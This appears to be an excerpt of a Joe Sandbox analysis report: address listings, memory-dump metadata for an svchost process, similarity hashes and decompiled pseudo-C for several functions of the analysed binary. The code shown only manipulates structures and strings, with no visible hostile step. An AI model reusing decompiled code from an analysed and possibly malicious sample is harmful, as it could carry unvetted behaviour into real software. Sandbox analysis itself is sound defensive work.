                                                                                                                                                                                                                                                    0x04023ddc
                                                                                                                                                                                                                                                    0x04023de6
                                                                                                                                                                                                                                                    0x04023de6
                                                                                                                                                                                                                                                    0x04023dfb
                                                                                                                                                                                                                                                    0x04023dfb
                                                                                                                                                                                                                                                    0x04023da4
                                                                                                                                                                                                                                                    0x04023da4
                                                                                                                                                                                                                                                    0x04023e04
                                                                                                                                                                                                                                                    0x04023e0b
                                                                                                                                                                                                                                                    0x04023e13
                                                                                                                                                                                                                                                    0x04023e1a
                                                                                                                                                                                                                                                    0x04023e1f
                                                                                                                                                                                                                                                    0x04023e25
                                                                                                                                                                                                                                                    0x04023e25
                                                                                                                                                                                                                                                    0x04023e0b
                                                                                                                                                                                                                                                    0x04023d8f
                                                                                                                                                                                                                                                    0x04023e33
                                                                                                                                                                                                                                                    0x04023e39
                                                                                                                                                                                                                                                    0x04023e40
                                                                                                                                                                                                                                                    0x04023e46
                                                                                                                                                                                                                                                    0x04023e58
                                                                                                                                                                                                                                                    0x04023e70
                                                                                                                                                                                                                                                    0x04023e7e
                                                                                                                                                                                                                                                    0x04023e84
                                                                                                                                                                                                                                                    0x04023e8b
                                                                                                                                                                                                                                                    0x04023e9c
                                                                                                                                                                                                                                                    0x04023e8d
                                                                                                                                                                                                                                                    0x04023e97
                                                                                                                                                                                                                                                    0x04023e97
                                                                                                                                                                                                                                                    0x04023eac
                                                                                                                                                                                                                                                    0x04023eac
                                                                                                                                                                                                                                                    0x04023e55
                                                                                                                                                                                                                                                    0x04023e55
                                                                                                                                                                                                                                                    0x04023eb5
                                                                                                                                                                                                                                                    0x04023ebc
                                                                                                                                                                                                                                                    0x04023ec4
                                                                                                                                                                                                                                                    0x04023ecb
                                                                                                                                                                                                                                                    0x04023ed0
                                                                                                                                                                                                                                                    0x04023ed6
                                                                                                                                                                                                                                                    0x04023ed6
                                                                                                                                                                                                                                                    0x04023ebc
                                                                                                                                                                                                                                                    0x04023e40
                                                                                                                                                                                                                                                    0x04023ee4
                                                                                                                                                                                                                                                    0x04023eea
                                                                                                                                                                                                                                                    0x04023ef1
                                                                                                                                                                                                                                                    0x04023ef7
                                                                                                                                                                                                                                                    0x04023f09
                                                                                                                                                                                                                                                    0x04023f21
                                                                                                                                                                                                                                                    0x04023f2f
                                                                                                                                                                                                                                                    0x04023f35
                                                                                                                                                                                                                                                    0x04023f3c
                                                                                                                                                                                                                                                    0x04023f4d
                                                                                                                                                                                                                                                    0x04023f3e
                                                                                                                                                                                                                                                    0x04023f48
                                                                                                                                                                                                                                                    0x04023f48
                                                                                                                                                                                                                                                    0x04023f5d
                                                                                                                                                                                                                                                    0x04023f5d
                                                                                                                                                                                                                                                    0x04023f06
                                                                                                                                                                                                                                                    0x04023f06
                                                                                                                                                                                                                                                    0x04023f66
                                                                                                                                                                                                                                                    0x04023f6d
                                                                                                                                                                                                                                                    0x04023f75
                                                                                                                                                                                                                                                    0x04023f7c
                                                                                                                                                                                                                                                    0x04023f81
                                                                                                                                                                                                                                                    0x04023f87
                                                                                                                                                                                                                                                    0x04023f87
                                                                                                                                                                                                                                                    0x04023f6d
                                                                                                                                                                                                                                                    0x04023ef1
                                                                                                                                                                                                                                                    0x04023f95
                                                                                                                                                                                                                                                    0x04023f9b
                                                                                                                                                                                                                                                    0x04023fa2
                                                                                                                                                                                                                                                    0x04023fa8
                                                                                                                                                                                                                                                    0x04023fba
                                                                                                                                                                                                                                                    0x04023fd2
                                                                                                                                                                                                                                                    0x04023fe0
                                                                                                                                                                                                                                                    0x04023fe6
                                                                                                                                                                                                                                                    0x04023fed
                                                                                                                                                                                                                                                    0x04023ffe
                                                                                                                                                                                                                                                    0x04023fef
                                                                                                                                                                                                                                                    0x04023ff9
                                                                                                                                                                                                                                                    0x04023ff9
                                                                                                                                                                                                                                                    0x0402400e
                                                                                                                                                                                                                                                    0x0402400e
                                                                                                                                                                                                                                                    0x04023fb7
                                                                                                                                                                                                                                                    0x04023fb7
                                                                                                                                                                                                                                                    0x04024017
                                                                                                                                                                                                                                                    0x0402401e
                                                                                                                                                                                                                                                    0x04024026
                                                                                                                                                                                                                                                    0x0402402d
                                                                                                                                                                                                                                                    0x04024038
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04024038
                                                                                                                                                                                                                                                    0x0402401e
                                                                                                                                                                                                                                                    0x04023fa2
                                                                                                                                                                                                                                                    0x04024042

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: codecvt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662085145-0
                                                                                                                                                                                                                                                    • Opcode ID: 481a094063eea0996d580fe575330a3dfc80b192d07c727697d1ca0252fb713b
                                                                                                                                                                                                                                                    • Instruction ID: a3cb5fddb2616e01ffbd0549c63a57f7e4090b46a873f7d090d06a3cf8222b0d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 481a094063eea0996d580fe575330a3dfc80b192d07c727697d1ca0252fb713b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5E18374A00328DFDB58CF94D998BADBBB2BF49308F244159D8096B391D776AD86CF40
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                                    			E04024820(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, signed int _a12) {
                                                                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr* _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                                                    				intOrPtr _t114;
                                                                                                                                                                                                                                                    				intOrPtr _t119;
                                                                                                                                                                                                                                                    				void* _t121;
                                                                                                                                                                                                                                                    				signed char _t124;
                                                                                                                                                                                                                                                    				intOrPtr _t130;
                                                                                                                                                                                                                                                    				void* _t146;
                                                                                                                                                                                                                                                    				void* _t198;
                                                                                                                                                                                                                                                    				void* _t199;
                                                                                                                                                                                                                                                    				void* _t200;
                                                                                                                                                                                                                                                    				void* _t201;
                                                                                                                                                                                                                                                    				void* _t203;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t199 = __esi;
                                                                                                                                                                                                                                                    				_t198 = __edi;
                                                                                                                                                                                                                                                    				_t146 = __ebx;
                                                                                                                                                                                                                                                    				_v64 = __ecx;
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				L1:
                                                                                                                                                                                                                                                    				while(_a4 >= 0) {
                                                                                                                                                                                                                                                    					_v28 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 4)) + 0x18));
                                                                                                                                                                                                                                                    					_v16 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 4)) + 0x14));
                                                                                                                                                                                                                                                    					if(_v28 != 0 && _v16 != 0) {
                                                                                                                                                                                                                                                    						_v20 =  *((intOrPtr*)( *((intOrPtr*)(_v16 + 4)) + _a4 * 4));
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_v20 + 0xc)) != 0) {
                                                                                                                                                                                                                                                    							E040114D0( *_v64, _a4, 0, 1, _a12 & 0x000000ff);
                                                                                                                                                                                                                                                    							_t114 = E04020CE0(8);
                                                                                                                                                                                                                                                    							_t201 = _t200 + 4;
                                                                                                                                                                                                                                                    							_v36 = _t114;
                                                                                                                                                                                                                                                    							if(_v36 == 0) {
                                                                                                                                                                                                                                                    								_v68 = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v68 = E0401F4E0(_v36);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v12 = _v68;
                                                                                                                                                                                                                                                    							E0401FC90(_t146, _v12, _t198, _t199,  *((intOrPtr*)(_v28 + 0x1c)), E040070A0( *((intOrPtr*)(_v28 + 0x1c))));
                                                                                                                                                                                                                                                    							_t119 = E04020CE0(8);
                                                                                                                                                                                                                                                    							_t203 = _t201 + 8;
                                                                                                                                                                                                                                                    							_v40 = _t119;
                                                                                                                                                                                                                                                    							if(_v40 == 0) {
                                                                                                                                                                                                                                                    								_v72 = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v72 = E0401F4E0(_v40);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v24 = _v72;
                                                                                                                                                                                                                                                    							_t121 = E040070A0( *((intOrPtr*)(_v28 + 0x20)));
                                                                                                                                                                                                                                                    							_t200 = _t203 + 4;
                                                                                                                                                                                                                                                    							_t189 =  *((intOrPtr*)(_v28 + 0x20));
                                                                                                                                                                                                                                                    							E0401FC90(_t146, _v24, _t198, _t199,  *((intOrPtr*)(_v28 + 0x20)), _t121);
                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                    								_t124 = E04015C60(_t146,  *_v64, _t189, _v12);
                                                                                                                                                                                                                                                    								_t190 = _t124 & 0x000000ff;
                                                                                                                                                                                                                                                    								if((_t124 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if((E04015C60(_t146,  *_v64, _t190, _v24) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    									E040114D0( *_v64, _a4, 0, 0, _a12 & 0x000000ff);
                                                                                                                                                                                                                                                    									_v32 = E040246A0(_t146, _v64, _t198, _t199);
                                                                                                                                                                                                                                                    									if(_v32 != 0) {
                                                                                                                                                                                                                                                    										_t130 = E04020CE0(0x14);
                                                                                                                                                                                                                                                    										_t200 = _t200 + 4;
                                                                                                                                                                                                                                                    										_v44 = _t130;
                                                                                                                                                                                                                                                    										if(_v44 == 0) {
                                                                                                                                                                                                                                                    											_v76 = 0;
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											_v76 = E04006060(_v44);
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										_v8 = _v76;
                                                                                                                                                                                                                                                    										 *_v8 = E040242C0(_t146, _v64, _t198, _t199, _v12);
                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_v8 + 4)) = E040243F0(_t146, _v64, _t198, _t199, _v12);
                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_v8 + 8)) = E04024180(_t146, _v64, _t198, _t199, _v24);
                                                                                                                                                                                                                                                    										_t195 = _a12 & 0x000000ff;
                                                                                                                                                                                                                                                    										if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    											_t79 = _v20 + 0xc; // 0xc7077400
                                                                                                                                                                                                                                                    											 *((intOrPtr*)(_v8 + 0xc)) = E040240B0(_t146, _v64, _t195, _t198, _t199,  *_t79);
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_v8 + 0x10)) = _v32;
                                                                                                                                                                                                                                                    										_t189 = 0;
                                                                                                                                                                                                                                                    										if(0 != 0) {
                                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                                                                    								if(_v12 != 0) {
                                                                                                                                                                                                                                                    									_v52 = _v12;
                                                                                                                                                                                                                                                    									_v48 = _v52;
                                                                                                                                                                                                                                                    									if(_v48 == 0) {
                                                                                                                                                                                                                                                    										_v80 = 0;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_v80 = E04004EA0(_v48, 1);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v12 = 0x666;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if(_v24 != 0) {
                                                                                                                                                                                                                                                    									_v60 = _v24;
                                                                                                                                                                                                                                                    									_v56 = _v60;
                                                                                                                                                                                                                                                    									if(_v56 == 0) {
                                                                                                                                                                                                                                                    										_v84 = 0;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_v84 = E04004EA0(_v56, 1);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v24 = 0x666;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if(0 != 0) {
                                                                                                                                                                                                                                                    									goto L1;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								goto L38;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L38:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L38;
                                                                                                                                                                                                                                                    			}


































                                                                                                                                                                                                                                                    0x04024820
                                                                                                                                                                                                                                                    0x04024820
                                                                                                                                                                                                                                                    0x04024820
                                                                                                                                                                                                                                                    0x04024826
                                                                                                                                                                                                                                                    0x04024829
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04024830
                                                                                                                                                                                                                                                    0x04024844
                                                                                                                                                                                                                                                    0x04024850
                                                                                                                                                                                                                                                    0x04024857
                                                                                                                                                                                                                                                    0x04024870
                                                                                                                                                                                                                                                    0x0402487a
                                                                                                                                                                                                                                                    0x04024893
                                                                                                                                                                                                                                                    0x0402489a
                                                                                                                                                                                                                                                    0x0402489f
                                                                                                                                                                                                                                                    0x040248a2
                                                                                                                                                                                                                                                    0x040248a9
                                                                                                                                                                                                                                                    0x040248b8
                                                                                                                                                                                                                                                    0x040248ab
                                                                                                                                                                                                                                                    0x040248b3
                                                                                                                                                                                                                                                    0x040248b3
                                                                                                                                                                                                                                                    0x040248c2
                                                                                                                                                                                                                                                    0x040248df
                                                                                                                                                                                                                                                    0x040248e6
                                                                                                                                                                                                                                                    0x040248eb
                                                                                                                                                                                                                                                    0x040248ee
                                                                                                                                                                                                                                                    0x040248f5
                                                                                                                                                                                                                                                    0x04024904
                                                                                                                                                                                                                                                    0x040248f7
                                                                                                                                                                                                                                                    0x040248ff
                                                                                                                                                                                                                                                    0x040248ff
                                                                                                                                                                                                                                                    0x0402490e
                                                                                                                                                                                                                                                    0x04024918
                                                                                                                                                                                                                                                    0x0402491d
                                                                                                                                                                                                                                                    0x04024924
                                                                                                                                                                                                                                                    0x0402492b
                                                                                                                                                                                                                                                    0x04024930
                                                                                                                                                                                                                                                    0x04024939
                                                                                                                                                                                                                                                    0x0402493e
                                                                                                                                                                                                                                                    0x04024943
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0402495d
                                                                                                                                                                                                                                                    0x04024976
                                                                                                                                                                                                                                                    0x04024983
                                                                                                                                                                                                                                                    0x0402498a
                                                                                                                                                                                                                                                    0x04024993
                                                                                                                                                                                                                                                    0x04024998
                                                                                                                                                                                                                                                    0x0402499b
                                                                                                                                                                                                                                                    0x040249a2
                                                                                                                                                                                                                                                    0x040249b1
                                                                                                                                                                                                                                                    0x040249a4
                                                                                                                                                                                                                                                    0x040249ac
                                                                                                                                                                                                                                                    0x040249ac
                                                                                                                                                                                                                                                    0x040249bb
                                                                                                                                                                                                                                                    0x040249cd
                                                                                                                                                                                                                                                    0x040249de
                                                                                                                                                                                                                                                    0x040249f0
                                                                                                                                                                                                                                                    0x040249f3
                                                                                                                                                                                                                                                    0x040249f9
                                                                                                                                                                                                                                                    0x040249fe
                                                                                                                                                                                                                                                    0x04024a0d
                                                                                                                                                                                                                                                    0x04024a0d
                                                                                                                                                                                                                                                    0x04024a16
                                                                                                                                                                                                                                                    0x04024a19
                                                                                                                                                                                                                                                    0x04024a1b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0402498c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0402495f
                                                                                                                                                                                                                                                    0x04024a21
                                                                                                                                                                                                                                                    0x04024a25
                                                                                                                                                                                                                                                    0x04024a2a
                                                                                                                                                                                                                                                    0x04024a30
                                                                                                                                                                                                                                                    0x04024a37
                                                                                                                                                                                                                                                    0x04024a48
                                                                                                                                                                                                                                                    0x04024a39
                                                                                                                                                                                                                                                    0x04024a43
                                                                                                                                                                                                                                                    0x04024a43
                                                                                                                                                                                                                                                    0x04024a4f
                                                                                                                                                                                                                                                    0x04024a4f
                                                                                                                                                                                                                                                    0x04024a5a
                                                                                                                                                                                                                                                    0x04024a5f
                                                                                                                                                                                                                                                    0x04024a65
                                                                                                                                                                                                                                                    0x04024a6c
                                                                                                                                                                                                                                                    0x04024a7d
                                                                                                                                                                                                                                                    0x04024a6e
                                                                                                                                                                                                                                                    0x04024a78
                                                                                                                                                                                                                                                    0x04024a78
                                                                                                                                                                                                                                                    0x04024a84
                                                                                                                                                                                                                                                    0x04024a84
                                                                                                                                                                                                                                                    0x04024a8d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04024a8d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0402487c
                                                                                                                                                                                                                                                    0x0402487a
                                                                                                                                                                                                                                                    0x04024a93
                                                                                                                                                                                                                                                    0x04024a99
                                                                                                                                                                                                                                                    0x04024a99
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 97f17c946a3c54a9cad3e83d6fdf94190c77b8b4620ad00b5b108f5948b5f234
                                                                                                                                                                                                                                                    • Instruction ID: a5d7251e2747225a00ddcb09f2389310aff70beb4688250c6b3f934d2e6ae519
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97f17c946a3c54a9cad3e83d6fdf94190c77b8b4620ad00b5b108f5948b5f234
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0491C6B4E00229EFDB08DF94D594BAEBBB1BF88308F148059E9157B390DB75A941CF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 04021A91
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 04021AB5
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 04021B49
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 04021B62
                                                                                                                                                                                                                                                      • Part of subcall function 040217B0: _memset.LIBCMT ref: 040217EA
                                                                                                                                                                                                                                                      • Part of subcall function 040217B0: _memset.LIBCMT ref: 04021800
                                                                                                                                                                                                                                                      • Part of subcall function 040217B0: _memset.LIBCMT ref: 0402181A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memset
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 2102423945-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: e94b19ba0fcb669e4e0cbc5759ced8619370a39b6899ccf5e07f60b5a10fbc88
                                                                                                                                                                                                                                                    • Instruction ID: 01bcd26e004969603b563e094358f1b64e43344fbc446aa7b287e43a94b7a553
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e94b19ba0fcb669e4e0cbc5759ced8619370a39b6899ccf5e07f60b5a10fbc88
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B715EB4E002089BEB10DB94DD45BEDB7B5BF48308F5041A8E609BB2C1D6766E55CF68
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                                    			E04013410(void* __ebx, intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				void _v60;
                                                                                                                                                                                                                                                    				void _v96;
                                                                                                                                                                                                                                                    				void* _v100;
                                                                                                                                                                                                                                                    				intOrPtr _v104;
                                                                                                                                                                                                                                                    				intOrPtr _v108;
                                                                                                                                                                                                                                                    				intOrPtr _v112;
                                                                                                                                                                                                                                                    				void* _v116;
                                                                                                                                                                                                                                                    				intOrPtr _v120;
                                                                                                                                                                                                                                                    				void* _v124;
                                                                                                                                                                                                                                                    				intOrPtr* _v128;
                                                                                                                                                                                                                                                    				intOrPtr _v132;
                                                                                                                                                                                                                                                    				void* _v136;
                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				intOrPtr _t87;
                                                                                                                                                                                                                                                    				intOrPtr _t95;
                                                                                                                                                                                                                                                    				void* _t98;
                                                                                                                                                                                                                                                    				signed int _t142;
                                                                                                                                                                                                                                                    				void* _t143;
                                                                                                                                                                                                                                                    				void* _t145;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t98 = __ebx;
                                                                                                                                                                                                                                                    				_v12 =  *0x429024 ^ _t142;
                                                                                                                                                                                                                                                    				_v128 = __ecx;
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				while(_a4 != 0) {
                                                                                                                                                                                                                                                    					memcpy( &_v60, 0x426ef4, 0xb << 2);
                                                                                                                                                                                                                                                    					asm("movsb");
                                                                                                                                                                                                                                                    					memcpy( &_v96, 0x426f24, 8 << 2);
                                                                                                                                                                                                                                                    					_t145 = _t143 + 0x18;
                                                                                                                                                                                                                                                    					asm("movsb");
                                                                                                                                                                                                                                                    					if( *(_a4 + 0x24) >= 0) {
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *_v128 + 0x2c)) >  *(_a4 + 0x24)) {
                                                                                                                                                                                                                                                    							_v108 = E040070A0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v128 + 0x28)) +  *(_a4 + 0x24) * 4)) + 0xc)));
                                                                                                                                                                                                                                                    							_v104 = _v108 + 0x1e;
                                                                                                                                                                                                                                                    							_v116 = E04020CE0(_v104 + 1);
                                                                                                                                                                                                                                                    							_v100 = _v116;
                                                                                                                                                                                                                                                    							E04007010(0x426f34, _v100, 0, _v104 + 1);
                                                                                                                                                                                                                                                    							 *0x4251f8(_v100, _v104 + 1,  &_v96,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v128 + 0x28)) +  *(_a4 + 0x24) * 4)) + 0xc)));
                                                                                                                                                                                                                                                    							_t87 = E04020CE0(8);
                                                                                                                                                                                                                                                    							_t143 = _t145 + 0x28;
                                                                                                                                                                                                                                                    							_v120 = _t87;
                                                                                                                                                                                                                                                    							if(_v120 == 0) {
                                                                                                                                                                                                                                                    								_v136 = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v136 = E0401F4E0(_v120);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t133 = _v136;
                                                                                                                                                                                                                                                    							_v8 = _v136;
                                                                                                                                                                                                                                                    							E0401FC90(_t98, _v8, 0x426f34, 0x426f24, _v100, _v104);
                                                                                                                                                                                                                                                    							if(_v100 != 0) {
                                                                                                                                                                                                                                                    								_t133 = _v100;
                                                                                                                                                                                                                                                    								_v124 = _v100;
                                                                                                                                                                                                                                                    								E04020CC0(_v124);
                                                                                                                                                                                                                                                    								_t143 = _t143 + 4;
                                                                                                                                                                                                                                                    								_v100 = 0x666;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                                                    							if(0 != 0) {
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							L16:
                                                                                                                                                                                                                                                    							return E04006C8C(_v8, _t98, _v12 ^ _t142, _t133, 0x426f34, 0x426f24);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t95 = E04020CE0(8);
                                                                                                                                                                                                                                                    					_t143 = _t145 + 4;
                                                                                                                                                                                                                                                    					_v112 = _t95;
                                                                                                                                                                                                                                                    					if(_v112 == 0) {
                                                                                                                                                                                                                                                    						_v132 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_v132 = E0401F4E0(_v112);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v8 = _v132;
                                                                                                                                                                                                                                                    					_t133 =  &_v60;
                                                                                                                                                                                                                                                    					E0401FC90(_t98, _v8, 0x426f34, 0x426f24,  &_v60, 0x2c);
                                                                                                                                                                                                                                                    					goto L15;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L16;
                                                                                                                                                                                                                                                    			}

























                                                                                                                                                                                                                                                    0x04013410
                                                                                                                                                                                                                                                    0x04013420
                                                                                                                                                                                                                                                    0x04013425
                                                                                                                                                                                                                                                    0x04013428
                                                                                                                                                                                                                                                    0x0401342f
                                                                                                                                                                                                                                                    0x04013447
                                                                                                                                                                                                                                                    0x04013449
                                                                                                                                                                                                                                                    0x04013457
                                                                                                                                                                                                                                                    0x04013457
                                                                                                                                                                                                                                                    0x04013459
                                                                                                                                                                                                                                                    0x04013461
                                                                                                                                                                                                                                                    0x040134b1
                                                                                                                                                                                                                                                    0x040134d5
                                                                                                                                                                                                                                                    0x040134de
                                                                                                                                                                                                                                                    0x040134f0
                                                                                                                                                                                                                                                    0x040134f6
                                                                                                                                                                                                                                                    0x04013506
                                                                                                                                                                                                                                                    0x04013532
                                                                                                                                                                                                                                                    0x0401353d
                                                                                                                                                                                                                                                    0x04013542
                                                                                                                                                                                                                                                    0x04013545
                                                                                                                                                                                                                                                    0x0401354c
                                                                                                                                                                                                                                                    0x0401355e
                                                                                                                                                                                                                                                    0x0401354e
                                                                                                                                                                                                                                                    0x04013556
                                                                                                                                                                                                                                                    0x04013556
                                                                                                                                                                                                                                                    0x04013568
                                                                                                                                                                                                                                                    0x0401356e
                                                                                                                                                                                                                                                    0x0401357c
                                                                                                                                                                                                                                                    0x04013585
                                                                                                                                                                                                                                                    0x04013587
                                                                                                                                                                                                                                                    0x0401358a
                                                                                                                                                                                                                                                    0x04013591
                                                                                                                                                                                                                                                    0x04013596
                                                                                                                                                                                                                                                    0x04013599
                                                                                                                                                                                                                                                    0x04013599
                                                                                                                                                                                                                                                    0x040135a0
                                                                                                                                                                                                                                                    0x040135a2
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040135a8
                                                                                                                                                                                                                                                    0x040135ba
                                                                                                                                                                                                                                                    0x040135ba
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040134b3
